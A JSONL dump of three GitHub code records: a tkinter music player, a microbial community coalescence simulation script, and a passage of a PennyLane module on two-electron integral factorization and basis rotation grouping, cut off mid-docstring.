+{"seq_id": "2550503270", "text": "from tkinter import *\nfrom tkinter import filedialog as fd\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom pygame import mixer\nimport webbrowser\nimport os\nfrom os import system, name\n\n\ndef dir():\n \n # for windows\n if name == 'nt':\n _ = os.chdir('C:/Sigma/bin')\n \n # for mac and linux(here, os.name is 'posix')\n else:\n username = os.getlogin()\n _ = os.chdir(f'/home/{username}/Sigma/bin')\n\ndir()\n\nmixer.init()\nroot = Tk()\n\nwidth,height = 400,190\nroot.geometry(f\"{width}x{height}\")\nroot.resizable(False, False)\n# root.iconbitmap('icon.bmp')\nroot.title(\"Sigma Music Player\")\nmixer.music.load(\"Sigmaintro.mp3\")\nmixer.music.play()\n\nbottom_plate = Label(text=\"Anas-Dew\", bg=\"Black\",\n fg=\"White\", font=\"sans 9 italic\")\nbottom_plate.pack(side=BOTTOM, fill=X)\n\n# ---NECESARY FUNCTIONS------------------------------------\ndef select_file():\n filetypes = (\n ('Music files', '*.mp3'),\n ('All files', '*.*')\n )\n \n mfile = fd.askopenfilename(\n title='Open music',\n initialdir='/',\n filetypes=filetypes\n )\n print(\"File Path : \" + mfile)\n mixer.music.load(mfile)\n mixer.music.play()\n title_bar.config(text=\"Playing...\")\n'''\nDis-countinued------\ndef select_folder():\n mfolder = fd.askdirectory()\n print(\"Selected Folder -> \" + mfolder)\n with open(\"cookie.ch\",\"w\") as c:\n c.write(str(mfolder))\n c.close()\nwith open(\"cookie.ch\",\"r\") as c:\n path = c.readline()\n os.chdir(path)\n c.close() \n''' \ndef Pause():\n mixer.music.pause()\n title_bar.config(text=\"Paused.\")\n\ndef Resume():\n mixer.music.unpause()\n title_bar.config(text=\"Playing...\")\n\ndef meow():\n user_choice = messagebox.askyesno(\"Feedback\",\"Did you like this app ?\")\n print(user_choice)\n if user_choice == True:\n rate_choice = messagebox.askyesno(\"Support\",\"Rate my project on Github.\")\n if rate_choice == True:\n messagebox.showinfo(\"Redirect\",\"You are being redirected to Github.\")\n webbrowser.open_new(\n r\"https://github.com/Anas-Dew/Sigma-Music-Player\")\n \n#-----------------------MENU BAR---------------------------\n\ndef menu_bar():\n menubar = Menu(root)\n\n def loop():\n messagebox.showwarning(\"Alert\",\"This feature is in development.\")\n\n #-----------Adding File Menu and commands-------------------\n file = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='File', menu=file)\n file.add_command(label='Open...', command=lambda: select_file())\n file.add_separator()\n file.add_command(label='Replay', command=lambda: mixer.music.play())\n file.add_checkbutton(label='Loop',command=loop)\n file.add_separator()\n file.add_command(label='Exit', command=root.destroy)\n\n # ----------Adding more Menu and commands------------\n more = Menu(menubar, tearoff=0)\n menubar.add_cascade(label='More', menu=more)\n more.add_command(label='Source Code',command=lambda: webbrowser.open_new(\n r\"https://github.com/Anas-Dew/Sigma-Music-Player\"))\n \n more.add_command(label='Meow !!', command=meow)\n more.add_separator()\n more.add_command(label='Thanks !', command=lambda: messagebox.showinfo(\"Developer's Note\",\"Thank you for using. ❤ \\nHope you liked it.\"))\n root.config(menu=menubar)\n\nmenu_bar()\n# ---------------LIST-BOX---------------------------------------------------\n# music_list = Listbox(root,height=7,width=65).pack()\n# -------------SCREEN-BUTTON------------------------------------------------\n\nopen_button = ttk.Button(root,text='Open Music',command=select_file)\nopen_button.pack(expand=False,pady=40)\n\n# ------------------NAVIGATION FRAME--------------------------------------\nplay_navi = Frame(root, bg=\"dark grey\", width=10,borderwidth=3,relief=SUNKEN)\n\ntitle_bar = Label(play_navi, text=\"Choose Music\",\n bg=\"dark grey\", fg=\"black\", font=\"Purisa 15 italic\")\ntitle_bar.pack(side=LEFT, padx=10)\npause_button = Button(play_navi, text=\"Pause\",\n bg=\"Black\", fg=\"White\", font=\"sans 9 italic\", padx=15, command=Pause)\npause_button.pack(side=RIGHT, padx=5)\nresume_button = Button(play_navi, text=\"Resume\",\n bg=\"Black\", fg=\"White\", font=\"sans 9 italic\", padx=10, command=Resume)\nresume_button.pack(side=RIGHT, padx=20)\n\nplay_navi.pack(side=BOTTOM, fill=X)\n#------------------------------------------------------\nroot.mainloop()", "repo_name": "Anas-Dew/Sigma-Music-Player", "sub_path": "Sigma/player.py", "file_name": "player.py", "file_ext": "py", "file_size_in_byte": 4453, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.name", "line_number": 14, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 15, "usage_type": "call"}, {"api_name": "os.getlogin", "line_number": 19, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 24, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 32, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 33, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 46, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 46, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 52, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 53, "usage_type": "name"}, {"api_name": "pygame.mixer.music.pause", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 69, "usage_type": "name"}, {"api_name": "pygame.mixer.music.unpause", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 73, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askyesno", "line_number": 77, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 77, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askyesno", "line_number": 80, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 80, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 82, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 82, "usage_type": "name"}, {"api_name": "webbrowser.open_new", "line_number": 83, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showwarning", "line_number": 92, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 92, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 99, "usage_type": "name"}, {"api_name": "webbrowser.open_new", "line_number": 107, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 112, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 112, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 120, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 120, "usage_type": "name"}]} +{"seq_id": "22373398406", "text": "#!/usr/bin/env python3\n\n__appname__ = '[s_plot.py]'\n__author__ = 'Pablo Lechon (plechon@ucm.es)'\n__version__ = '0.0.1'\n\n## IMPORTS ##\n\nimport sys\nimport pandas as pd\nimport numpy as np\nfrom scipy.integrate import solve_ivp, odeint\nfrom coalescence import uniform_pack\nfrom functions import * \nimport matplotlib.pylab as plt\nfrom itertools import combinations, product\nfrom progressbar import ProgressBar\nfrom scipy.special import comb\n\n## CONSTANTS ##\n\nglobal R; R = 8.314462618 # J/(K mol)\nglobal DeltaGATP; deltaGATP = 75e3 # J/mol\nglobal T; T = 298 # k \nglobal E; E = 3e6 # j (Total energy contained in metabolites)\n\n## FUNCTIONS ##\n\n\ndef main(argv):\n '''Main function'''\n\n #Load communities data \n composition = pd.read_csv('../data/coal_composition.csv', index_col = 0)\n networks = pd.read_csv('../data/coal_network.csv', index_col = 0)\n time_series = pd.read_csv('../data/coal_time_series.csv', index_col = 0)\n all_data = pd.read_csv('../data/community_data.csv')\n\n #Transform from string to numeric vector all elements in substrate and \n #product colums\n all_data['substrate'] = all_data['substrate'].apply(lambda x: \n np.fromstring(x[1:-1], sep=' ', dtype = int))\n all_data['product'] = all_data['product'].apply(lambda x: \n np.fromstring(x[1:-1], sep=' ', dtype = int))\n keys = list(composition.keys())\n #Metabolite list\n met_list = [i for i in keys if i.startswith('m')]\n #Number of metabolites\n m = len(met_list)\n s = len([i for i in keys if i.startswith('s')])\n #Vector of richnesses\n richness = np.unique(all_data.richness)\n #Preallocate storing objects\n column_names = [\"similarity\", \"cohesion\"]\n similarity_fitness = pd.DataFrame(columns = column_names)\n tn = np.array([])\n Nn = np.array([])\n richnessn = np.array([], dtype = int)\n n_simulationn = np.array([], dtype = int)\n strainsn = np.array([], dtype = int)\n c_numbern = np.array([], dtype = int)\n\n #Get communities with richness 5\n r = 5\n comp_long = all_data[all_data.richness == r]\n #Perform coalescence events between all posible pairs of communities \n #How many communities do we have?\n com_simul = np.unique(comp_long.n_simulation)\n num_com = len(com_simul)\n #Get all pairs of competing communities \n all_pairs = list(combinations(com_simul, 2))\n #How many pairs?\n it = len(all_pairs)\n #Initialize storing objects\n similarity = np.zeros(it)\n DF = np.zeros(it)\n DP2 = np.zeros(it)\n pbar = ProgressBar()\n print('Coalescence of communities of richness:', r)\n for i in pbar(range(it)):\n #Pick communities numbers c1 and c2\n c1 = all_pairs[i][0]\n c2 = all_pairs[i][1]\n #Extract community information\n comp_c1 = comp_long[comp_long.n_simulation == c1].reset_index(drop = True)\n comp_c2 = comp_long[comp_long.n_simulation == c2].reset_index(drop = True)\n #Get number of strains in each community\n num_c1 = len(comp_c1)\n num_c2 = len(comp_c2)\n s = num_c1 + num_c2\n #Obtain reaction networks of c1 as a list of tuples\n net_C1 = vector2tuple(comp_c1['substrate'],\n comp_c1['product'])\n net_C2 = vector2tuple(comp_c2['substrate'],\n comp_c2['product'])\n #Facilitation matrix of initial communities\n f_mat = facilitation_matrix(net_C1, m)\n f_mat2 = facilitation_matrix(net_C2, m)\n #Competition matrix \n c_mat = competition_matrix(net_C1, m)\n c_mat2 = competition_matrix(net_C2, m)\n #Cohesion of each ccommunity\n P2_c1 = np.mean(np.sum(f_mat-c_mat, axis = 1))\n P2_c2 = np.mean(np.sum(f_mat2-c_mat2, axis = 1))\n #Calculate difference in cohesion\n DP2[i] = P2_c1 - P2_c2\n #Perform coalescence event between c1 and c2\n t, z, nets = coalescence_event(C1 = comp_c1, \n C2 = comp_c2, \n m = m, \n s = s)\n\n #Get aboundance time series\n N = z[0:s]\n #Get abundance vector of species after coalescence at stable state\n abundance_f = N[:, -1] \n #Create dataframe of coalescence outcome\n outcome = pd.concat([comp_c1, comp_c2])\n outcome['stable.state'] = abundance_f\n #Eliminate extinctions\n outcome = outcome[outcome['stable.state'] > 1].reset_index(drop = True)\n #Obtain reaction networks of outcome as a list of tuples\n #net_outcome = vector2tuple(outcome['substrate'],\n # outcome['product'])\n #Number of species present in community c1 originally\n abundance_0 = np.array(comp_c1['stable.state'])\n #Add as many 0 as species in community c2 to calculate similarity\n abundance_0 = np.concatenate([abundance_0, np.zeros(num_c2)])\n #Calculate similarity \n similarity[i] = np.dot(abundance_0, abundance_f)/\\\n (np.sqrt(sum(abundance_0**2))*\\\n np.sqrt(sum(abundance_f**2)))\n\n similarity_fitness = pd.DataFrame({'similarity':similarity,\n 'delP2':DP2})\n\n\n similarity_fitness.to_csv('../data/similarity_fitness.csv')\n return 0\n\n## CODE ##\n\nif (__name__ == '__main__'):\n status = main(sys.argv)\n sys.exit(status)\n \n \n", "repo_name": "pablolich/master_thesis", "sub_path": "code/s_plot.py", "file_name": "s_plot.py", "file_ext": "py", "file_size_in_byte": 5438, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 68, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "progressbar.ProgressBar", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 134, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 144, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "31504304822", "text": "import pennylane as qml\nfrom pennylane import numpy as np\n\n\ndef factorize(two_electron, tol_factor=1.0e-5, tol_eigval=1.0e-5):\n r\"\"\"Return the double-factorized form of a two-electron integral tensor in spatial basis.\n\n The two-electron tensor :math:`V`, in\n `chemist notation `_, is first\n factorized in terms of symmetric matrices :math:`L^{(r)}` such that\n :math:`V_{ijkl} = \\sum_r^R L_{ij}^{(r)} L_{kl}^{(r) T}`. The rank :math:`R` is determined by a\n threshold error. Then, each matrix :math:`L^{(r)}` is diagonalized and its eigenvalues (and\n corresponding eigenvectors) are truncated at a threshold error.\n\n Args:\n two_electron (array[array[float]]): two-electron integral tensor in the molecular orbital\n basis arranged in chemist notation\n tol_factor (float): threshold error value for discarding the negligible factors\n tol_eigval (float): threshold error value for discarding the negligible factor eigenvalues\n\n Returns:\n tuple(array[array[float]], list[array[float]], list[array[float]]): tuple containing\n symmetric matrices (factors) approximating the two-electron integral tensor, truncated\n eigenvalues of the generated factors, and truncated eigenvectors of the generated factors\n\n **Example**\n\n >>> symbols = ['H', 'H']\n >>> geometry = np.array([[0.0, 0.0, 0.0],\n ... [1.398397361, 0.0, 0.0]], requires_grad=False)\n >>> mol = qml.qchem.Molecule(symbols, geometry)\n >>> core, one, two = qml.qchem.electron_integrals(mol)()\n >>> two = np.swapaxes(two, 1, 3) # convert to chemist notation\n >>> factors, eigvals, eigvecs = factorize(two, 1e-5, 1e-5)\n >>> print(factors)\n [[[ 1.06723440e-01 9.73575768e-15]\n [ 8.36288956e-15 -1.04898533e-01]]\n [[-2.20945401e-13 -4.25688222e-01]\n [-4.25688222e-01 -2.98228790e-13]]\n [[-8.14472856e-01 5.01669019e-13]\n [ 5.01689072e-13 -8.28642140e-01]]]\n\n .. details::\n :title: Theory\n\n The second quantized electronic Hamiltonian is constructed in terms of fermionic creation,\n :math:`a^{\\dagger}` , and annihilation, :math:`a`, operators as\n [`arXiv:1902.02134 `_]\n\n .. math::\n\n H = \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq} h_{pq} a_{p,\\alpha}^{\\dagger}\n a_{q, \\alpha} + \\frac{1}{2} \\sum_{\\alpha, \\beta \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pqrs}\n h_{pqrs} a_{p, \\alpha}^{\\dagger} a_{q, \\beta}^{\\dagger} a_{r, \\beta} a_{s, \\alpha},\n\n where :math:`h_{pq}` and :math:`h_{pqrs}` are the one- and two-electron integrals computed\n as\n\n .. math::\n\n h_{pq} = \\int \\phi_p(r)^* \\left ( -\\frac{\\nabla_r^2}{2} - \\sum_i \\frac{Z_i}{|r-R_i|} \\right)\n \\phi_q(r) dr,\n\n and\n\n .. math::\n\n h_{pqrs} = \\int \\frac{\\phi_p(r_1)^* \\phi_q(r_2)^* \\phi_r(r_2) \\phi_s(r_1)}{|r_1 - r_2|}\n dr_1 dr_2.\n\n The two-electron integrals can be rearranged in the so-called chemist notation which gives\n\n .. math::\n\n V_{pqrs} = \\int \\frac{\\phi_p(r_1)^* \\phi_q(r_1)^* \\phi_r(r_2) \\phi_s(r_2)}{|r_1 - r_2|}\n dr_1 dr_2,\n\n and the molecular Hamiltonian can be rewritten as\n\n .. math::\n\n H = \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq} T_{pq} a_{p,\\alpha}^{\\dagger}\n a_{q, \\alpha} + \\frac{1}{2} \\sum_{\\alpha, \\beta \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pqrs}\n V_{pqrs} a_{p, \\alpha}^{\\dagger} a_{q, \\alpha} a_{r, \\beta}^{\\dagger} a_{s, \\beta},\n\n with\n\n .. math::\n\n T_{pq} = h_{pq} - \\frac{1}{2} \\sum_s h_{pssq}.\n\n\n This notation allows a low-rank factorization of the two-electron integral. The objective of\n the factorization is to find a set of symmetric matrices, :math:`L^{(r)}`, such that\n\n .. math::\n\n V_{ijkl} = \\sum_r^R L_{ij}^{(r)} L_{kl}^{(r) T},\n\n with the rank :math:`R \\leq n^2` where :math:`n` is the number of molecular orbitals. The\n matrices :math:`L^{(r)}` are diagonalized and for each matrix the eigenvalues that are\n smaller than a given threshold (and their corresponding eigenvectors) are discarded.\n\n The factorization algorithm has the following steps\n [`arXiv:1902.02134 `_]:\n\n - Reshape the :math:`n \\times n \\times n \\times n` two-electron tensor to a\n :math:`n^2 \\times n^2` matrix where :math:`n` is the number of orbitals.\n\n - Diagonalize the resulting matrix and keep the :math:`r` eigenvectors that have\n corresponding eigenvalues larger than a threshold.\n\n - Multiply the eigenvectors by the square root of the eigenvalues to obtain\n matrices :math:`L^{(r)}`.\n\n - Reshape the selected eigenvectors to :math:`n \\times n` matrices.\n\n - Diagonalize the :math:`n \\times n` matrices and for each matrix keep the eigenvalues (and\n their corresponding eigenvectors) that are larger than a threshold.\n \"\"\"\n shape = two_electron.shape\n\n if len(shape) != 4 or len(set(shape)) != 1:\n raise ValueError(\"The two-electron repulsion tensor must have a (N x N x N x N) shape.\")\n\n n = shape[0]\n two = two_electron.reshape(n * n, n * n)\n\n eigvals_r, eigvecs_r = np.linalg.eigh(two)\n eigvals_r = np.array([val for val in eigvals_r if abs(val) > tol_factor])\n\n eigvecs_r = eigvecs_r[:, -len(eigvals_r) :]\n\n if eigvals_r.size == 0:\n raise ValueError(\n \"All factors are discarded. Consider decreasing the first threshold error.\"\n )\n\n vectors = eigvecs_r @ np.diag(np.sqrt(eigvals_r))\n\n r = len(eigvals_r)\n factors = np.array([vectors.reshape(n, n, r)[:, :, k] for k in range(r)])\n\n eigvals, eigvecs = np.linalg.eigh(factors)\n eigvals_m = []\n eigvecs_m = []\n for n, eigval in enumerate(eigvals):\n idx = [i for i, v in enumerate(eigval) if abs(v) > tol_eigval]\n eigvals_m.append(eigval[idx])\n eigvecs_m.append(eigvecs[n][idx])\n\n if np.sum([len(v) for v in eigvecs_m]) == 0:\n raise ValueError(\n \"All eigenvectors are discarded. Consider decreasing the second threshold error.\"\n )\n\n return factors, eigvals_m, eigvecs_m\n\n\ndef basis_rotation(one_electron, two_electron, tol_factor=1.0e-5):\n r\"\"\"Return the grouped coefficients and observables of a molecular Hamiltonian and the basis\n rotation unitaries obtained with the basis rotation grouping method.\n\n Args:\n one_electron (array[float]): one-electron integral matrix in the molecular orbital basis\n two_electron (array[array[float]]): two-electron integral tensor in the molecular orbital\n basis arranged in chemist notation\n tol_factor (float): threshold error value for discarding the negligible factors\n\n Returns:\n tuple(list[array[float]], list[list[Observable]], list[array[float]]): tuple containing\n grouped coefficients, grouped observables and basis rotation transformation matrices\n\n **Example**\n\n >>> symbols = ['H', 'H']\n >>> geometry = np.array([[0.0, 0.0, 0.0],\n ... [1.398397361, 0.0, 0.0]], requires_grad=False)\n >>> mol = qml.qchem.Molecule(symbols, geometry)\n >>> core, one, two = qml.qchem.electron_integrals(mol)()\n >>> coeffs, ops, unitaries = basis_rotation(one, two, tol_factor=1.0e-5)\n >>> print(coeffs)\n [array([ 0.84064649, -2.59579282, 0.84064649, 0.45724992, 0.45724992]),\n array([ 9.57150297e-05, 5.60006390e-03, 9.57150297e-05, 2.75092558e-03,\n -9.73801723e-05, -2.79878310e-03, -9.73801723e-05, -2.79878310e-03,\n -2.79878310e-03, -2.79878310e-03, 2.84747318e-03]),\n array([ 0.04530262, -0.04530262, -0.04530262, -0.04530262, -0.04530262,\n 0.09060523, 0.04530262]),\n array([-0.66913628, 1.6874169 , -0.66913628, 0.16584151, -0.68077716,\n 0.16872663, -0.68077716, 0.16872663, 0.16872663, 0.16872663,\n 0.17166195])]\n\n .. details::\n :title: Theory\n\n A second-quantized molecular Hamiltonian can be constructed in the\n `chemist notation `_ format\n following Eq. (1) of\n [`PRX Quantum 2, 030305, 2021 `_]\n as\n\n .. math::\n\n H = \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq} T_{pq} a_{p,\\alpha}^{\\dagger}\n a_{q, \\alpha} + \\frac{1}{2} \\sum_{\\alpha, \\beta \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pqrs}\n V_{pqrs} a_{p, \\alpha}^{\\dagger} a_{q, \\alpha} a_{r, \\beta}^{\\dagger} a_{s, \\beta},\n\n where :math:`V_{pqrs}` denotes a two-electron integral in the chemist notation and\n :math:`T_{pq}` is obtained from the one- and two-electron integrals, :math:`h_{pq}` and\n :math:`h_{pqrs}`, as\n\n .. math::\n\n T_{pq} = h_{pq} - \\frac{1}{2} \\sum_s h_{pssq}.\n\n The tensor :math:`V` can be converted to a matrix which is indexed by the indices :math:`pq`\n and :math:`rs` and eigendecomposed up to a rank :math:`R` to give\n\n .. math::\n\n V_{pqrs} = \\sum_r^R L_{pq}^{(r)} L_{rs}^{(r) T},\n\n where :math:`L` denotes the matrix of eigenvectors of the matrix :math:`V`. The molecular\n Hamiltonian can then be rewritten following Eq. (7) of\n [`Phys. Rev. Research 3, 033055, 2021 `_]\n as\n\n .. math::\n\n H = \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq} T_{pq} a_{p,\\alpha}^{\\dagger}\n a_{q, \\alpha} + \\frac{1}{2} \\sum_r^R \\left ( \\sum_{\\alpha \\in \\{\\uparrow, \\downarrow \\} } \\sum_{pq}\n L_{pq}^{(r)} a_{p, \\alpha}^{\\dagger} a_{q, \\alpha} \\right )^2.\n\n The orbital basis can be rotated such that each :math:`T` and :math:`L^{(r)}` matrix is\n diagonal. The Hamiltonian can then be written following Eq. (2) of\n [`npj Quantum Information, 7, 23 (2021) `_]\n as\n\n .. math::\n\n H = U_0 \\left ( \\sum_p d_p n_p \\right ) U_0^{\\dagger} + \\sum_r^R U_r \\left ( \\sum_{pq}\n d_{pq}^{(r)} n_p n_q \\right ) U_r^{\\dagger},\n\n where the coefficients :math:`d` are obtained by diagonalizing the :math:`T` and\n :math:`L^{(r)}` matrices. The number operators :math:`n_p = a_p^{\\dagger} a_p` can be\n converted to qubit operators using\n\n .. math::\n\n n_p = \\frac{1-Z_p}{2},\n\n where :math:`Z_p` is the Pauli :math:`Z` operator applied to qubit :math:`p`. This gives\n the qubit Hamiltonian\n\n .. math::\n\n H = U_0 \\left ( \\sum_p O_p^{(0)} \\right ) U_0^{\\dagger} + \\sum_r^R U_r \\left ( \\sum_{q} O_q^{(r)} \\right ) U_r^{\\dagger},\n\n where :math:`O = \\sum_i c_i P_i` is a linear combination of Pauli words :math:`P_i` that are\n a tensor product of Pauli :math:`Z` and Identity operators. This allows all the Pauli words\n in each of the :math:`O` terms to be measured simultaneously. This function returns the\n coefficients and the Pauli words grouped for each of the :math:`O` terms as well as the\n basis rotation transformation matrices that are constructed from the eigenvectors of the\n :math:`T` and :math:`L^{(r)}` matrices. Each column of the transformation matrix is an\n eigenvector of the corresponding :math:`T` or :math:`L^{(r)}` matrix.\n \"\"\"\n\n num_orbitals = one_electron.shape[0] * 2\n one_body_tensor, chemist_two_body_tensor = _chemist_transform(one_electron, two_electron)\n chemist_one_body_tensor = np.kron(one_body_tensor, np.eye(2)) # account for spin\n t_eigvals, t_eigvecs = np.linalg.eigh(chemist_one_body_tensor)\n\n factors, _, _ = factorize(chemist_two_body_tensor, tol_factor=tol_factor)\n factors = [np.kron(factor, np.eye(2)) for factor in factors] # account for spin\n\n v_coeffs, v_unitaries = np.linalg.eigh(factors)\n indices = [np.argsort(v_coeff)[::-1] for v_coeff in v_coeffs]\n v_coeffs = [v_coeff[indices[idx]] for idx, v_coeff in enumerate(v_coeffs)]\n v_unitaries = [v_unitary[:, indices[idx]] for idx, v_unitary in enumerate(v_unitaries)]\n\n ops_t = 0.0\n for p in range(num_orbitals):\n ops_t += 0.5 * t_eigvals[p] * (qml.Identity(p) - qml.PauliZ(p))\n\n ops_l = []\n for idx in range(len(factors)):\n ops_l_ = 0.0\n for p in range(num_orbitals):\n for q in range(num_orbitals):\n ops_l_ += (\n v_coeffs[idx][p]\n * v_coeffs[idx][q]\n * 0.25\n * (\n qml.Identity(p)\n - qml.PauliZ(p)\n - qml.PauliZ(q)\n + qml.pauli.pauli_mult_with_phase(qml.PauliZ(p), qml.PauliZ(q))[0]\n )\n )\n ops_l.append(ops_l_)\n\n ops = [ops_t] + ops_l\n c_group = [op.coeffs for op in ops]\n o_group = [op.ops for op in ops]\n u_transform = list([t_eigvecs] + list(v_unitaries)) # Inverse of diagonalizing unitaries\n\n return c_group, o_group, u_transform\n\n\ndef _chemist_transform(one_body_tensor=None, two_body_tensor=None, spatial_basis=True):\n r\"\"\"Transforms one- and two-body terms in physicists' notation to `chemists' notation `_\\ .\n\n This converts the input two-body tensor :math:`h_{pqrs}` that constructs :math:`\\sum_{pqrs} h_{pqrs} a^\\dagger_p a^\\dagger_q a_r a_s`\n to a transformed two-body tensor :math:`V_{pqrs}` that follows the chemists' convention to construct :math:`\\sum_{pqrs} V_{pqrs} a^\\dagger_p a_q a^\\dagger_r a_s`\n in the spatial basis. During the tranformation, some extra one-body terms come out. These are returned as a one-body tensor :math:`T_{pq}` in the\n chemists' notation either as is or after summation with the input one-body tensor :math:`h_{pq}`, if provided.\n\n Args:\n one_body_tensor (array[float]): a one-electron integral tensor giving the :math:`h_{pq}`.\n two_body_tensor (array[float]): a two-electron integral tensor giving the :math:`h_{pqrs}`.\n spatial_basis (bool): True if the integral tensor are passed in spatial-orbital basis. False if they are in spin basis.\n\n Returns:\n tuple(array[float], array[float]) or tuple(array[float],): transformed one-body tensor :math:`T_{pq}` and two-body tensor :math:`V_{pqrs}` for the provided terms.\n\n **Example**\n\n >>> symbols = ['H', 'H']\n >>> geometry = np.array([[0.0, 0.0, 0.0],\n ... [1.398397361, 0.0, 0.0]], requires_grad=False)\n >>> mol = qml.qchem.Molecule(symbols, geometry)\n >>> core, one, two = qml.qchem.electron_integrals(mol)()\n >>> qml.qchem.factorization._chemist_transform(two_body_tensor=two, spatial_basis=True)\n (tensor([[-0.427983, -0. ],\n [-0. , -0.439431]], requires_grad=True),\n tensor([[[[0.337378, 0. ],\n [0. , 0.331856]],\n [[0. , 0.090605],\n [0.090605 , 0. ]]],\n [[[0. , 0.090605],\n [0.090605 , 0. ]],\n [[0.331856, 0. ],\n [0. , 0.348826]]]], requires_grad=True))\n\n .. details::\n :title: Theory\n\n The two-electron integral in physicists' notation is defined as:\n\n .. math::\n\n \\langle pq \\vert rs \\rangle = h_{pqrs} = \\int \\frac{\\chi^*_{p}(x_1) \\chi^*_{q}(x_2) \\chi_{r}(x_1) \\chi_{s}(x_2)}{|r_1 - r_2|} dx_1 dx_2,\n\n while in chemists' notation it is written as:\n\n .. math::\n\n [pq \\vert rs] = V_{pqrs} = \\int \\frac{\\chi^*_{p}(x_1) \\chi_{q}(x_1) \\chi^*_{r}(x_2) \\chi_{s}(x_2)}{|r_1 - r_2|} dx_1 dx_2.\n\n In the spin basis, this index reordering :math:`pqrs \\rightarrow psrq` leads to formation of one-body terms :math:`h_{prrs}` that come out during\n the coversion:\n\n .. math::\n\n h_{prrs} = \\int \\frac{\\chi^*_{p}(x_1) 